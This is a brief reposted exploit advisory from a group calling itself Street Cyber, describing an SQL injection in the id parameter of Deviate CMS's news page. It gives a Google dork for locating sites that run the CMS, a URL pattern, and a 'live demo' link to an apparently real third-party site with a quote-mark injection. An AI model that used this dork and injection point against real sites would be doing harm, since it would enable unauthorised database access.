Home / os / linux

Deviate CMS SQL Injection Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Deviate CMS SQL Injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |------------------------------------------------------------------[+] |[+] Exploit Title: Deviate CMS SQL Injection Vulnerability |[+] |[+] Exploit Author : Street Cyber |[+] |[+] Google Dork: intext:"Designed and produced by Deviate Ltd" |[+] |[+] Tested on: Windows 8 |[+] |[+] Date : 2016/07/11 |------------------------------------------------------------------[+] |[+] PoC: |[+] id Parameter Vulnerable To SQL Error : |[+] 1-SQL Injection |[+] Demo : |[+] http://www.site.com/news-full.php?nid=[ID] |[+] |[+] |[+] Live Demo : |[+] http://www.p5n.net/mtl/news-full.php?id=14' |[+] |----------------------------------------------------[+] |[+] discovered by : |[+] Sir_Mamad_Danger |[+] |[+] My friends : |[+] |[+] Kian Error and all street cyber members ... |[+]--------------------------------------------[+] |[+] Homepage : |[+] http://streetcyber.com |[+]-------------------------------------------[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| </BODY></HTML>

 

TOP